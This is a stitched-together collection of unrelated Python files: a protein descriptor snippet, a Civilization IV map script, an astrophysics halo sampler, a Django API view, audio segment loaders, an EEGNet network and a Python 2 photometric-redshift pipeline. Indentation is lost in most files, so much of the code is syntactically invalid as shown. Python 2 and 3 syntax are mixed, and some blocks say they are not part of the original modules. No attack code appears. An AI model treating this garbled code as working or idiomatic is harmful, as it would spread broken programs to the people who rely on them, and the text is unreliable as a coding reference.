# PAAC2=_GetPseudoAAC2(protein,lamda=4)
# for i in PAAC2:
# print i, PAAC2[i]
# print len(PAAC1)
# print _GetSequenceOrderCorrelationFactorForAPAAC(protein,k=1)
# APAAC1=_GetAPseudoAAC1(protein,lamda=4)
# for i in APAAC1:
# print i, APAAC1[i]
# APAAC2=GetAPseudoAAC2(protein,lamda=4)
# for i in APAAC2:
# print i, APAAC2[i]
# APAAC=GetAPseudoAAC(protein,lamda=4)
#
# for i in APAAC:
# print i, APAAC[i]
PAAC = GetPseudoAAC(protein, lamda=5, AAP=[_Hydrophobicity, _hydrophilicity])
for i in PAAC:
print(i, PAAC[i])
|
"""
Author: Mohammad Dehghani Ashkezari <mdehghan@uw.edu>
Date: 2019-07-27
Function: Trains machine learning models using Simons CMAP data sets.
"""
|
#
# FILE: Balanced.py
# AUTHOR: Andy Szybalski
# PURPOSE: Global map script - Solid pangaea, balanced strategic resources.
#-----------------------------------------------------------------------------
# Copyright (c) 2004, 2005 Firaxis Games, Inc. All rights reserved.
#-----------------------------------------------------------------------------
#
from CvPythonExtensions import *
import CvUtil
import random
import CvMapGeneratorUtil
import sys
from CvMapGeneratorUtil import HintedWorld
from CvMapGeneratorUtil import TerrainGenerator
from CvMapGeneratorUtil import FeatureGenerator
def getDescription():
return "TXT_KEY_MAP_SCRIPT_BALANCED_DESCR"
resourcesToBalance = ('BONUS_ALUMINUM', 'BONUS_COAL', 'BONUS_COPPER', 'BONUS_HORSE', 'BONUS_IRON', 'BONUS_OIL', 'BONUS_URANIUM')
resourcesToEliminate = ('BONUS_MARBLE', 'BONUS_OIL')
def getTopLatitude():
return 70
def getBottomLatitude():
return -70
def generatePlotTypes():
NiTextOut("Setting Plot Types (Python Balanced) ...")
global hinted_world
hinted_world = HintedWorld(16,8)
mapRand = CyGlobalContext().getGame().getMapRand()
numBlocks = hinted_world.w * hinted_world.h
numBlocksLand = int(numBlocks*0.25)
cont = hinted_world.addContinent(numBlocksLand,mapRand.get(5, "Generate Plot Types PYTHON")+4,mapRand.get(3, "Generate Plot Types PYTHON")+2)
if not cont:
print "Couldn't create continent! Reverting to C implementation."
CyPythonMgr().allowDefaultImpl()
else:
for x in range(hinted_world.w):
for y in (0, hinted_world.h - 1):
hinted_world.setValue(x,y, 1) # force ocean at poles
hinted_world.buildAllContinents()
return hinted_world.generatePlotTypes(shift_plot_types=True)
# subclass TerrainGenerator to eliminate arctic, equatorial latitudes
class BTerrainGenerator(CvMapGeneratorUtil.TerrainGenerator):
def getLatitudeAtPlot(self, iX, iY):
"returns 0.0 for tropical, up to 1.0 for polar"
lat = CvMapGeneratorUtil.TerrainGenerator.getLatitudeAtPlot(self, iX, iY) # range [0,1]
lat = 0.05 + 0.75*lat # range [0.05, 0.75]
return lat
def generateTerrainTypes():
NiTextOut("Generating Terrain (Python Balanced) ...")
terraingen = BTerrainGenerator()
terrainTypes = terraingen.generateTerrain()
return terrainTypes
# subclass FeatureGenerator to eliminate arctic, equatorial latitudes
class BFeatureGenerator(CvMapGeneratorUtil.FeatureGenerator):
def getLatitudeAtPlot(self, iX, iY):
"returns 0.0 for tropical, up to 1.0 for polar"
lat = CvMapGeneratorUtil.FeatureGenerator.getLatitudeAtPlot(self, iX, iY) # range [0,1]
lat = 0.05 + 0.75*lat # range [0.05, 0.75]
return lat
def addFeatures():
NiTextOut("Adding Features (Python Balanced) ...")
featuregen = BFeatureGenerator()
featuregen.addFeatures()
return 0
def normalizeAddExtras():
gc = CyGlobalContext()
map = CyMap()
for i in range(gc.getMAX_CIV_PLAYERS()):
if (gc.getPlayer(i).isAlive()):
start_plot = gc.getPlayer(i).getStartingPlot() # returns a CyPlot
startx, starty = start_plot.getX(), start_plot.getY()
plots = [] # build a list of the plots near the starting plot
for dx in range(-5,6):
for dy in range(-5,6):
x,y = startx+dx, starty+dy
pLoopPlot = map.plot(x,y)
if not pLoopPlot.isNone():
plots.append(pLoopPlot)
resources_placed = []
for pass_num in range(4):
bIgnoreUniqueRange = pass_num >= 1
bIgnoreOneArea = pass_num >= 2
bIgnoreAdjacent = pass_num >= 3
for bonus in range(gc.getNumBonusInfos()):
type_string = gc.getBonusInfo(bonus).getType()
if (type_string not in resources_placed) and (type_string in resourcesToBalance):
for (pLoopPlot) in plots:
if (pLoopPlot.canHaveBonus(bonus, True)):
if isBonusValid(bonus, pLoopPlot, bIgnoreUniqueRange, bIgnoreOneArea, bIgnoreAdjacent):
pLoopPlot.setBonusType(bonus)
resources_placed.append(type_string)
#print "placed", type_string, "on pass", pass_num
break # go to the next bonus
CyPythonMgr().allowDefaultImpl() # do the rest of the usual normalizeStartingPlots stuff, don't overrride
def addBonusType(argsList):
[iBonusType] = argsList
gc = CyGlobalContext()
type_string = gc.getBonusInfo(iBonusType).getType()
if (type_string in resourcesToBalance) or (type_string in resourcesToEliminate):
return None # don't place any of this bonus randomly
else:
CyPythonMgr().allowDefaultImpl() # pretend we didn't implement this method, and let C handle this bonus in the default way
def isBonusValid(eBonus, pPlot, bIgnoreUniqueRange, bIgnoreOneArea, bIgnoreAdjacent):
"Returns true if we can place a bonus here"
map = CyMap()
gc = CyGlobalContext()
iX, iY = pPlot.getX(), pPlot.getY()
if (not bIgnoreOneArea) and gc.getBonusInfo(eBonus).isOneArea():
if map.getNumBonuses(eBonus) > 0:
if map.getArea(pPlot.getArea()).getNumBonuses(eBonus) == 0:
return False
if not bIgnoreAdjacent:
for iI in range(DirectionTypes.NUM_DIRECTION_TYPES):
pLoopPlot = plotDirection(iX, iY, DirectionTypes(iI))
if not pLoopPlot.isNone():
if (pLoopPlot.getBonusType(-1) != -1) and (pLoopPlot.getBonusType(-1) != eBonus):
return False
if not bIgnoreUniqueRange:
uniqueRange = gc.getBonusInfo(eBonus).getUniqueRange()
for iDX in range(-uniqueRange, uniqueRange+1):
for iDY in range(-uniqueRange, uniqueRange+1):
pLoopPlot = plotXY(iX, iY, iDX, iDY)
if not pLoopPlot.isNone() and pLoopPlot.getBonusType(-1) == eBonus:
return False
return True
|
import numpy as np
class LensConeUniform(object):
"""
This class generates samples drawn uniformly in two dimensions out to maximum radius
r(z) = 0.5 * cone_opening_angle * f(z), where cone_opening_angle is the opening angle of the rendering volume
specified when creating the realization, and f(z) is given by geometry.rendering_scale(z) and depends on the rendering
    geometry. For example, if the rendering volume is defined as DOUBLE_CONE (the default setting), then f(z) = 1
for z < z_lens and decreases approaching the source redshift at z > z_lens. As the effect of the rendering geometry
is built into this class, it is best used to generate halo positions distributed randomly in two dimensions
along the line of sight.
"""
def __init__(self, cone_opening_angle, geometry):
"""
:param cone_opening_angle: the opening angle of the rendering volume [arcsec]
If the rendering geometry is DOUBLE_CONE (default) then this is the opening angle of the cone
        If the rendering geometry is set to CYLINDER, then this sets the comoving radius of the cylinder such that
        a ray that moves in a straight line from the observer to the lens plane at an angle cone_opening_angle intersects
the edge of the cylinder at z_lens.
:param geometry: an instance of Geometry (Cosmology.geometry)
"""
self._cosmo_geometry = geometry
self._uni = Uniform(0.5 * cone_opening_angle, geometry)
def draw(self, N, z_plane, center_x=0, center_y=0):
"""
Generates samples in two dimensions out to a maximum radius r = 0.5 * cone_opening_angle * f(z)
where f(z) = geometry.rendering_scale(z)
:param N: number of objects to generate
:param z_plane: the redshift where the objects are being placed (used to compute the conversion to physical kpc)
:param center_x: the x-center of the rendering area [arcsec]
:param center_y: the y-center of the rendering area [arcsec]
:return: the x and y coordinates sampled in 2D [kpc]
"""
if N == 0:
return np.array([]), np.array([])
rescale = self._cosmo_geometry.rendering_scale(z_plane)
x_kpc, y_kpc = self._uni.draw(N, z_plane, rescale=rescale,
center_x=center_x, center_y=center_y)
return x_kpc, y_kpc
class Uniform(object):
"""
This class generates samples distributed uniformly in two dimensions out to a radius 0.5 * cone_opening_angle
"""
def __init__(self, rmax2d_arcsec, geometry):
"""
:param rmax2d_arcsec: the maximum radius to render objects [arcsec]
:param geometry: an instance of Geometry (Cosmology.geometry)
"""
self.rmax2d_arcsec = rmax2d_arcsec
self._geo = geometry
def draw(self, N, z_plane, rescale=1.0, center_x=0, center_y=0):
"""
Generate samples distributed uniformly in two dimensions
:param N: number of objects to generate
:param z_plane: the redshift where the objects are being placed (used to compute the conversion to physical kpc)
:param rescale: rescales the maximum rendering radius
:param center_x: the x-center of the rendering area [arcsec]
:param center_y: the y-center of the rendering area [arcsec]
:return: the x and y coordinates sampled in 2D [kpc]
"""
if N == 0:
return [], []
angle = np.random.uniform(0, 2 * np.pi, int(N))
rmax = self.rmax2d_arcsec * rescale
r = np.random.uniform(0, rmax ** 2, int(N))
x_arcsec = r ** .5 * np.cos(angle)
y_arcsec = r ** .5 * np.sin(angle)
x_arcsec += center_x
y_arcsec += center_y
kpc_per_asec = self._geo.kpc_per_arcsec(z_plane)
x_kpc, y_kpc = x_arcsec * kpc_per_asec, y_arcsec * kpc_per_asec
return np.array(x_kpc), np.array(y_kpc)
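# Illustrative usage sketch (not part of the original module). The MockGeometry below is
# an assumption standing in for the real Geometry object (Cosmology.geometry), which
# provides rendering_scale(z) and kpc_per_arcsec(z); the returned numbers are placeholders.
if __name__ == "__main__":

    class MockGeometry(object):

        def rendering_scale(self, z):
            # no rescaling with redshift, as for a CYLINDER-like rendering volume
            return 1.0

        def kpc_per_arcsec(self, z):
            # placeholder angular-diameter conversion [kpc / arcsec]
            return 5.0

    sampler = LensConeUniform(cone_opening_angle=6.0, geometry=MockGeometry())
    x_kpc, y_kpc = sampler.draw(N=1000, z_plane=0.5)
    print(x_kpc.shape, y_kpc.shape)  # (1000,) (1000,)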
|
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer
from django.http import HttpResponse
from .serializers import EstimatorSerializer
from src.estimator import estimator
from rest_framework_xml.renderers import XMLRenderer
from .models import RequestLog
@api_view(['POST'])
@renderer_classes([JSONRenderer, XMLRenderer])
def estimator_view(request, format=None):
serializer = EstimatorSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
data = estimator(serializer.validated_data)
return Response(data)
@api_view(['GET'])
def logs_view(request, ):
log_string = ''
all_logs = RequestLog.objects.order_by('-created_on')
for log in all_logs:
        request_time = "{:02d}".format(log.request_time)
log_string += f"{log.method}\t\t{log.path}\t\t{log.status_code}\t\t{request_time}ms\n"
return HttpResponse(log_string, content_type='text/plain')
|
import os
from utils.file_utils import strip_ext
from utils.logger import get_logger
from utils.signal_processing import units_to_sample
from utils.eaf_helper import eaf2df
import logging
class TxtSegments(object):
def __init__(self, root_dir, ts_units="s", add_labels=False, sep="\t", ext=".txt"):
self.root_dir = root_dir
self.ts_units = ts_units
self.add_labels = add_labels
self.sep = sep
self.ext = ext
self.seg_files = [x for x in os.listdir(self.root_dir) if x.endswith(self.ext)]
def get_segs_for_file(self, audio_file, sample_rate):
base_name = strip_ext(os.path.basename(audio_file))
possible_files = [x for x in self.seg_files if base_name in x]
res = []
if len(possible_files) > 0:
seg_file = os.path.join(self.root_dir, possible_files[0])
if len(possible_files) > 1:
get_logger().log(logging.WARNING, "Found multiple matches for %s (%s). Using %s" %
(audio_file, " ".join(possible_files), seg_file))
res = get_txt_segs(seg_file, sample_rate, base_name, self.add_labels, self.sep, self.ts_units)
else:
            get_logger().log(logging.WARNING, "No seg file found for %s in %s" % (audio_file, self.root_dir))
return res
class EafSegments(object):
def __init__(self, root_dir, ts_units="s", add_labels=False, ext=".eaf"):
self.root_dir = root_dir
self.ts_units = ts_units
self.add_labels = add_labels
self.ext = ext
self.seg_files = [x for x in os.listdir(self.root_dir) if x.endswith(self.ext)]
def get_segs_for_file(self, audio_file, sample_rate):
base_name = strip_ext(os.path.basename(audio_file))
possible_files = [x for x in self.seg_files if base_name in x]
res = []
if len(possible_files) > 0:
seg_file = os.path.join(self.root_dir, possible_files[0])
if len(possible_files) > 1:
get_logger().log(logging.WARNING, "Found multiple matches for %s (%s). Using %s" %
(audio_file, " ".join(possible_files), seg_file))
res = get_eaf_segs(seg_file, sample_rate, base_name, self.add_labels)
else:
            get_logger().log(logging.WARNING, "No seg file found for %s in %s" % (audio_file, self.root_dir))
return res
def get_eaf_segs(seg_file, sample_rate, base_name, add_labels):
df = eaf2df(seg_file)
    df["start"] = df["timeslot_start_ms"] / 1000.0 * sample_rate  # milliseconds -> seconds -> samples
    df["end"] = df["timeslot_end_ms"] / 1000.0 * sample_rate
df["key"] = df.apply(lambda x: "%s-%s-%i-%i" % (base_name, x["annotation_id"], x["start"], x["end"]), axis=1)
if add_labels:
cols = ["start", "end", "key", "annotation"]
else:
cols = ["start", "end", "key"]
res = list(df[cols].to_records(index=False))
return res
def get_txt_segs(seg_file, sample_rate, base_name, add_labels, sep, ts_units):
res = []
with open(seg_file, "r") as f:
for i, line in enumerate(f):
start, end, label = line.strip().split(sep)
start = units_to_sample(start, ts_units, sample_rate)
end = units_to_sample(end, ts_units, sample_rate)
key = "%s-%i-%s-%s" % (base_name, i, str(start), str(end))
if add_labels:
res.append((start, end, key, label))
else:
res.append((start, end, key))
return res
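# Illustrative note (not part of the original module): the plain-text segment format that
# TxtSegments/get_txt_segs expect, assuming the defaults sep="\t" and ts_units="s":
#
#     0.00<TAB>1.25<TAB>speech
#     1.25<TAB>2.10<TAB>noise
#
# Each line yields (start_sample, end_sample, key) -- plus the label when add_labels=True --
# after units_to_sample() converts the timestamps to samples using the audio sample rate.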
|
# -*- coding: utf-8 -*-
"""EEGNet: Compact Convolutional Neural Network (Compact-CNN) https://arxiv.org/pdf/1803.04566.pdf
"""
import torch
from torch import nn
from .common.conv import SeparableConv2d
class CompactEEGNet(nn.Module):
"""
EEGNet: Compact Convolutional Neural Network (Compact-CNN)
https://arxiv.org/pdf/1803.04566.pdf
"""
def __init__(self, num_channel=10, num_classes=4, signal_length=1000, f1=96, f2=96, d=1):
super().__init__()
self.signal_length = signal_length
# layer 1
self.conv1 = nn.Conv2d(1, f1, (1, signal_length), padding=(0,signal_length//2))
self.bn1 = nn.BatchNorm2d(f1)
self.depthwise_conv = nn.Conv2d(f1, d*f1, (num_channel, 1), groups=f1)
self.bn2 = nn.BatchNorm2d(d*f1)
self.avgpool1 = nn.AvgPool2d((1,4))
# layer 2
self.separable_conv = SeparableConv2d(
in_channels=f1,
out_channels=f2,
kernel_size=(1,16)
)
self.bn3 = nn.BatchNorm2d(f2)
self.avgpool2 = nn.AvgPool2d((1,8))
# layer 3
self.linear = nn.Linear(in_features=f2*(signal_length//32), out_features=num_classes)
self.dropout = nn.Dropout(p=0.5)
self.elu = nn.ELU()
def forward(self, x):
# layer 1
x = torch.unsqueeze(x,1)
x = self.conv1(x)
x = self.bn1(x)
x = self.depthwise_conv(x)
x = self.bn2(x)
x = self.elu(x)
x = self.avgpool1(x)
x = self.dropout(x)
# layer 2
x = self.separable_conv(x)
x = self.bn3(x)
x = self.elu(x)
x = self.avgpool2(x)
x = self.dropout(x)
# layer 3
x = torch.flatten(x, start_dim=1)
x = self.linear(x)
return x
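# Illustrative sketch (not part of the original module): a minimal depthwise-separable
# convolution of the kind CompactEEGNet imports from .common.conv. The real SeparableConv2d
# may differ; this stand-in assumes 'same'-style padding on the time axis, which keeps the
# flattened feature size consistent with f2 * (signal_length // 32).
if __name__ == "__main__":

    class _SeparableConv2dSketch(nn.Module):

        def __init__(self, in_channels, out_channels, kernel_size):
            super().__init__()
            pad = (kernel_size[0] // 2, kernel_size[1] // 2)
            # depthwise: one spatial filter per input channel
            self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size,
                                       padding=pad, groups=in_channels)
            # pointwise: 1x1 convolution that mixes channels
            self.pointwise = nn.Conv2d(in_channels, out_channels, kernel_size=1)

        def forward(self, x):
            return self.pointwise(self.depthwise(x))

    # smoke test on a (batch, f1, 1, time) tensor like the one reaching separable_conv
    sep = _SeparableConv2dSketch(96, 96, (1, 16))
    y = sep(torch.randn(2, 96, 1, 250))
    print(y.shape)  # torch.Size([2, 96, 1, 251])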
|
#!/usr/bin/env python
def parse_column_file(input,output=None,offsets=None):
f = open(input,'r').readlines()
dict = {}
for l in f:
import re
        res = re.split('\s+',l)
print res
if len(res) > 3:
t = {}
t['cols'] = res[1]
t['offset'] = float(res[4])
dict[res[0]] = t
else:
dict[res[0]] = {'cols':res[1]}
if offsets:
for key in dict:
if key in offsets:
dict[key]['offset'] += offsets[key]
if not output: output = input + '.new'
o = open(input,'w')
for key in dict:
if 'offset' in dict[key]:
o.write(key + '\t' + dict[key]['cols'] + '\tAB\t0.02\t' + str(dict[key]['offset']) + '\n')
else:
o.write(key + '\t' + dict[key]['cols'] + '\n')
o.close()
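# Illustrative note (not part of the original pipeline): parse_column_file expects
# BPZ-style .columns rows of the form
#
#     FILTER_NAME   col_spec   AB   0.02   zeropoint_offset
#
# where the fifth field (the zeropoint offset) is optional; rows without it are written
# back as "FILTER_NAME   col_spec" only. The column meanings here are inferred from the
# parsing above and may differ from the real catalogs.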
def fit_zps(dictionary):
dictionary['INTERP'] = 0
command = 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE yes \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP %(INTERP)s \
-INTERACTIVE yes \
-ONLY_TYPE yes \
-OUTPUT %(catalog)s' % dictionary
print ' command=',command
import commands
for i in range(1):
import os
os.system('cat ' + dictionary['columns'])
print 'running'
f = commands.getoutput(command).split('\n')
print ' f=',f
go = False
index = 0
import string
offsets = {}
for i in range(len(f)):
print f[i]
if string.find(f[i],'Average') != -1:
import re
filts = re.split('\s+',f[i+1])[1:]
deltas = [float(x) for x in re.split('\s+',f[i+4])[1:-1]]
offsets = dict(zip(filts,deltas))
break
print ' offsets=',offsets
print dictionary['columns']
parse_column_file(dictionary['columns'],offsets=offsets)
#raw_input('finished fit_zps')
def convert_to_mags(run_name,mag_cat,outputfile):
import astropy, astropy.io.fits as pyfits
mag = pyfits.open(mag_cat)[1]
cat = run_name + '.bpz'
#adam-tmp# from useful import *
from coeio import loaddata, loadfile, params_cl, str2num, loaddict, findmatch1, pause #, prange, plotconfig
bpzstr = loadfile(cat)
bpzparams = {}
i = 0
import string
while bpzstr[i][:2] == '##':
line = bpzstr[i][2:]
if '=' in line:
[key, value] = string.split(line, '=')
bpzparams[key] = value
i = i + 1
print bpzparams['FLUX_COMPARISON']
columns = bpzparams.get('COLUMNS', run_name+'.columns')
flux_comparison = run_name + '.flux_comparison' #bpzparams.get('FLUX_COMPARISON', run_name+'.flux_comparison')
zs=get_2Darray(cat) #Read the whole file
print zs
all=get_2Darray(flux_comparison) #Read the whole file
ncols=len(all[0,:])
nf=(ncols-5)/3
filters=get_str(columns,0,nf)
print filters
import numpy
#t = numpy.loadtxt(inputcat)
#all=get_2Darray(inputcat) #Read the whole file
print len(all[:,0])
ncols=len(all[0,:])
print len(all[0,:] )
nf=(ncols-5)/3
''' need to get the number of filters '''
''' need to retrieve the flux predicted, flux observed, and flux_error '''
import scipy
ID=scipy.array(all[:,0]) # FLUX (from spectrum for that TYPE)
ft=scipy.array(all[:,5:5+nf]) # FLUX (from spectrum for that TYPE)
fo=scipy.array(all[:,5+nf:5+2*nf]) # FLUX (OBSERVED)
efo=scipy.array(all[:,5+2*nf:5+3*nf]) # FLUX_ERROR (OBSERVED)
all_num = len(ft)
print all_num
import math as m
print -2.5*scipy.log10(ft)
import astropy, astropy.io.fits as pyfits, numpy
tables = {}
i = 0
cols = []
''' if column not already there, then add it '''
cols.append(pyfits.Column(name='SeqNr', format = 'J', array = ID))
cols.append(pyfits.Column(name='NFILT', format = 'J', array = mag.data.field('NFILT')))
for i in range(len(filters)):
print filters[i], i, ft[:,i]
added = False
for column in mag.columns:
if 'MAG_APER-' + filters[i] == column.name:
measured = mag.data.field('MAG_APER-'+filters[i])
if len(measured[measured!=-99]) > 0:
''' subsitute where there are -99 values '''
measured[measured==-99] = -2.5*scipy.log10(ft[:,i])
cols.append(pyfits.Column(name='HYBRID_MAG_APER-' + filters[i], format = '1E', array = measured))
added = True
print 'measured', filters[i]
break
if not added:
cols.append(pyfits.Column(name='HYBRID_MAG_APER-'+filters[i], format = '1E', array = -2.5*scipy.log10(ft[:,i])))
#cols.append(pyfits.Column(name='MAGERR_APER-'+filters[i], format = '1E', array = 99.*numpy.ones(2)))
import scipy
for column in mag.columns:
if string.find(column.name,'MAG') == -1:
a = -2.5*scipy.log10(mag.data.field(column.name))
a[mag.data.field(column.name) == 0] = -99
cols.append(pyfits.Column(name='DATA_' + column.name.replace('FLUX','MAG'), format = column.format, array = a))
else:
a = mag.data.field(column.name)
cols.append(pyfits.Column(name='DATA_' + column.name, format = column.format, array = a))
print cols
print len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print outputfile
hdulist.writeto(outputfile)
def add_dummy_ifilter(catalog, outputfile):
import astropy, astropy.io.fits as pyfits, numpy
i = 0
cols = []
tables = pyfits.open(catalog)['OBJECTS']
for col in ['SeqNr']:
cols.append(pyfits.Column(name=col, format = 'J', array = tables.data.field(col)))
already_there = False
for column in tables.columns:
cols.append(column)
if column.name == 'FLUX_APER1-SUBARU-10_2-1-W-S-I+':
already_there = True
''' if column not already there, then add it STILL NEED TO IMPLEMENT !!! '''
rows = len(pyfits.open(catalog)['OBJECTS'].data)
if not already_there:
cols.append(pyfits.Column(name='FLUX_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUXERR_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUX_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUXERR_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAG_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAGERR_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAG_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAGERR_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
print ' cols=',cols
print ' len(cols)=',len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print ' outputfile=',outputfile
hdulist.writeto(outputfile)
def add_dummy_filters(catalog, outputfile):
add_filters =['MEGAPRIME-0-1-g','MEGAPRIME-0-1-r','MEGAPRIME-0-1-i','MEGAPRIME-0-1-z','SUBARU-10_2-1-W-S-G+','SUBARU-10_2-1-W-C-RC','SUBARU-10_2-1-W-C-IC']
use_filters = ['MEGAPRIME-0-1-u','SUBARU-10_2-1-W-J-B','SUBARU-10_2-1-W-J-V','SUBARU-10_2-1-W-S-R+','SUBARU-10_2-1-W-S-I+','SUBARU-10_2-1-W-S-Z+']
import astropy, astropy.io.fits as pyfits, numpy
i = 0
cols = []
tables = pyfits.open(catalog)['OBJECTS']
for col in ['SeqNr','B_mask','V_mask','i_mask','z_mask']:
cols.append(pyfits.Column(name=col, format = 'J', array = tables.data.field(col)))
for filt in use_filters: # tables[str(i)]['OBJECTS'].columns:
cols.append(pyfits.Column(name='MAG_APER-'+filt, format = '1E', array = tables.data.field('MAG_APER-'+filt)))
cols.append(pyfits.Column(name='MAGERR_APER-'+filt, format = '1E', array = tables.data.field('MAGERR_APER-'+filt)))
''' if column not already there, then add it STILL NEED TO IMPLEMENT !!! '''
rows = len(pyfits.open(catalog)['OBJECTS'].data)
for filt in add_filters:
cols.append(pyfits.Column(name='MAG_APER-'+filt, format = '1E', array = -99.*numpy.ones(rows)))
cols.append(pyfits.Column(name='MAGERR_APER-'+filt, format = '1E', array = 99.*numpy.ones(rows)))
print ' cols=',cols
print ' len(cols)=',len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print ' outputfile=',outputfile
hdulist.writeto(outputfile)
def mkplot(file,name):
import MySQLdb
import os, sys, anydbm, time
import lib, scipy, pylab
from scipy import arange
file = open(file,'r').readlines()
results = []
for line in file:
if line[0] != '#':
import re
res = re.split('\s+',line)
#for i in range(len(res)):
# print res[i],i
results.append([float(res[2]),float(res[23]),res[1]])
diff = []
z = []
z_spec = []
zbs = {'0,0.2':[],'0.2,0.4':[],'0.4,0.6':[],'0.6,0.8':[]}
for line in results:
diff_val = (line[0] - line[1])/(1 + line[1])
diff.append(diff_val)
z.append(line[0])
z_spec.append(line[1])
for zb in zbs.keys():
import re
min,max = re.split('\,',zb)
if float(min) <= float(line[1]) < float(max):
zbs[zb].append(diff_val)
for zb in zbs.keys():
import scipy
print ' zb=',zb , ' scipy.median(scipy.array(zbs[zb]))=',scipy.median(scipy.array(zbs[zb]))
ys = []
for y in zbs[zb]:
if abs(y) < 0.1:
ys.append(y)
print ' scipy.mean(scipy.array(ys))=',scipy.mean(scipy.array(ys))
list = diff[:]
import pylab
varps = []
a, b, varp = pylab.hist(diff,bins=arange(-0.2,0.2,0.016))
#print a,b,varp
varps.append(varp[0])
diff_cut = []
for d in range(len(diff)):
        if abs(diff[d]) < 0.25:
diff_cut.append(diff[d])
list = scipy.array(diff_cut)
mu = list.mean()
median = scipy.median(diff_cut)
sigma = list.std()
print 'mu', mu
print 'sigma', sigma
sigma = 0.06
print ' len(z)=',len(z) , ' len(diff)=',len(diff)
reject = []
for line in results:
diff_val = (line[0] - line[1] - median)/(1 + line[1])
if abs(diff_val)>3*sigma: reject.append(line[2])
print reject
from scipy import stats
fit_a, fit_b, fit_varp = pylab.hist(diff_cut,bins=arange(-0.2,0.2,0.016))
pdf = scipy.stats.norm.pdf(fit_b, mu, sigma)
print 'pdf', pdf
height = scipy.array(a).max()
print pdf
pylab.plot(fit_b,len(diff_cut)*pdf/pdf.sum(),'r')
pylab.xlabel("(PhotZ - SpecZ)/(1 + SpecZ)")
pylab.ylabel("Number of Galaxies")
pylab.show()
pylab.savefig(name + 'RedshiftErrors.ps')
pylab.clf()
import scipy, numpy
from scipy import optimize
A = numpy.hstack((scipy.array(z)[:,numpy.newaxis],numpy.ones(len(z))[:,numpy.newaxis]))
#print A
#print scipy.shape(A)
#print scipy.shape(scipy.array(diff))
#(m,b), resids, rank, s = scipy.linalg.basic.lstsq(A,scipy.array(diff))
#pylab.plot(z,m*z+b,label='best-fit')
pylab.scatter(z_spec,z)
pylab.plot(scipy.array([0,1]),scipy.array([0,1]),color='red')
pylab.xlim(0,1)
pylab.ylim(0,1)
#pylab.ylabel("(PhotZ - SpecZ)/(1 + SpecZ)")
pylab.xlabel("PhotZ")
pylab.show()
pylab.savefig(name + 'RedshiftScatter.ps')
pylab.clf()
return reject
def get_cluster_z(file):
import ldac, numpy
f = ldac.openObjectFile(file)
arr = numpy.zeros(151)
for iz in f['Z']:
#print iz
n=int(iz*100.)
if n>150:
n=150
if n < 0:
n=0
#print "filling ",n
arr[n]= arr[n]+1
max = 0
maxind=0
for i in range(151):
#print max , maxind,arr[i]
if arr[i]>max:
max=arr[i]
maxind=i
Z = float(maxind)/100.
print Z
return Z
def join_cats(cs,outputfile):
import astropy, astropy.io.fits as pyfits
tables = {}
i = 0
cols = []
seqnr = 0
for c in cs:
if len(c) == 2:
TAB = c[1]
c = c[0]
else: TAB = 'STDTAB'
i += 1
print c
tables[str(i)] = pyfits.open(c)
for column in tables[str(i)][TAB].columns:
if column.name == 'SeqNr':
if not seqnr:
seqnr += 1
else:
column.name = column.name + '_' + str(seqnr)
seqnr += 1
cols.append(column)
print cols
print len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='STDTAB'
import os
os.system('rm ' + outputfile)
print outputfile
hdulist.writeto(outputfile)
def parse(file,filters,constantFilter, columns,cluster):
import re
#filters = re.split('\,',filters[:-1])
filter_off = {}
filter_off_wild = {}
if True:
print file
f = open(file).readlines()
import string
for line in f:
if string.find(line,'SHIFTS') != -1:
shifts = line
res = re.split('\s+',shifts.replace(',',''))[2:-1]
shifts_v = res
break
print res
for i in range(len(filters)):
filter_off[filters[i]] = res[i]
filter_off_wild[filters[i].replace('-1-','%').replace('-2-','%').replace('-3-','%')] = res[i]
res_fix = []
''' now apply same offsets to chips from the same filter '''
for i in range(len(filters)):
zo = float(res[i])
if zo == 0:
zo = filter_off_wild[filters[i].replace('-1-','%').replace('-2-','%').replace('-3-','%')]
print zo
res_fix.append(str(zo))
print res_fix
print filter_off
import photometry_db
photometry_db.initConnection()
''' save to database '''
for filt in filters:
''' now loop over apertures '''
        print cluster, filt, float(filter_off[filt])
        slrZP = photometry_db.registerLePhareZP(cluster, filt, constantFilter, float(filter_off[filt]))
import string
